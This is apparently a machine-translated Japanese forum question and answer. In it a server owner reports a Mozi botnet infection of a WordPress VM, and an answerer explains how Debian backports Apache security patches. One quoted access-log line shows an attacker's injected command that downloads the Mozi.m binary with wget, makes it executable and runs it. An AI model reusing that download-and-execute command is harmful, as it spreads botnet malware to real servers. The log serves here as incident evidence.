私は最近、Google Compute Engineで実行されている私のWordPressブログがMoziマルウェアに感染し、長い間ボットネットの一部であったことを発見しました。 (これは第三者からGoogle Warningsの違法攻撃の試みを受けたために確認されました。)。
まず、私の仮想マシンが何を実行しているかを見てみましょう。
OS: Debian 9 Strech
Web Server: Apache 2.4.25
DB: MySQL 5.7.30
phpMyAdmin 5.0.2
Wordpress 5.5.1
私が見つけたものを見てみましょう:
Apache2のaccess.logの一部
115[.]61.116.192 - - [20/Oct/2020:10:53:15 +0000] "27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0" 400 0 "-" "-"
wgetを使用してスクリプトをダウンロードし、chmod 777を試してランダムなコードを実行しようとします。
Apache2 error.logの一部
chmod: changing permissions of '/opt/c2d/downloads/phpmyadmin/doc/html/genindex.html': Operation not permitted
chmod: changing permissions of '/opt/c2d/downloads/phpmyadmin/doc/html/index.html': Operation not permitted
chmod: changing permissions of '/opt/c2d/downloads/phpmyadmin/index.php': Operation not permitted
chmod: changing permissions of '/opt/c2d/downloads/phpmyadmin/setup/index.php': Operation not permitted
ランダムコードを正常に実行したようです。 rootではありませんが、ユーザーwww-dataが悪意のあるPHPスクリプトを正常に修正しました。
脆弱なバージョンのApacheを実行していますが、ハッカーがこの脆弱性を悪用したことは明らかだと思います。CVE-2019-0211、CVEデータベースから検索した後。
私はApacheをアップグレードしようとしましたが、aptが最新バージョンを実行していることを見て驚きました。私の言葉は、これが2019年の脆弱性であることを意味します。私はバージョン2.5.25を実行しており、Apacheは現在2.5.46です。検索してこの記事を読みました。Unix SEの投稿Debian はさまざまなパッケージバージョンを扱います (私は Debian をあまり使用していないので、彼らがそのようなことをどう思うかを知っています)。
私の質問は:私のシステムにパッチを適用するためにApacheをどのように更新しますか?ご存知のように、できるだけ早く解決策を見つける必要があります。
編集する
出力dpkg -l apache2:
Desired=Unknown/Install/Remove/Purge/Hold
| Status=Not/Inst/Conf-files/Unpacked/halF-conf/Half-inst/trig-aWait/Trig-pend
|/ Err?=(none)/Reinst-required (Status,Err: uppercase=bad)
||/ Name Version Architecture Description
+++-======================-================-================-==================================================
ii apache2 2.4.25-3+deb9u9 amd64 Apache HTTP Server
答え1
問題があることがわかりますが、そうではありません。
Debian は、ディストリビューションの存続期間中に同じアップストリーム バージョンのパッケージに固執することが知られています。これが彼らの方針であり、ある場合には利点があり、他の場合には欠点があります。
しかし、もちろん Debian はタイムリーにセキュリティ問題を解決しています。しかし、これは通常、問題を解決するアップストリームバージョンを使用して新しいパッケージを作成しないため、明確ではないかもしれません。代わりに、ディストリビューションに含まれている「以前の」バージョンに適用されたときに問題を解決する特定のパッチを作成しています。
たとえば、Debian Buster では、書き込み時にすべてのリリースアップデートが適用された結果の出力aptitude show apache2に次の行が含まれます。
Version: 2.4.38-3+deb10u4
最初の数字(2.4.38)はApacheバージョンで、2番目の部分(-3+deb10u4)は「パッチレベル」として理解できます。 2番目の部分はセキュリティ上の問題が修正されるたびに変わります(最初の部分は実際のApacheバージョン番号であり、そのリリースの存続期間中は変わりません)。
逆に:Debian Apache 2.4.38パッケージのソースコードは次のとおりです。元のアップストリームApache 2.4.38のソースコードは、パッチ(セキュリティ修正)がApache 2.4.38に適用されたためです。これらの修正は、次のバージョンに表示されることがあります。〜の後バージョン番号が高い上流のソースコードです。
簡単に言うと、すべてのアップデート(apt-get updateなどaptitude dist-upgrade)をタイムリーに適用し、aptを正しく設定した場合(主にまたは/etc/apt/sources.listのファイル/etc/apt/sources.d)を心配することはありません(ハッキングがWordPressではなくWordPressを介して発生した可能性があります)。 Apache)。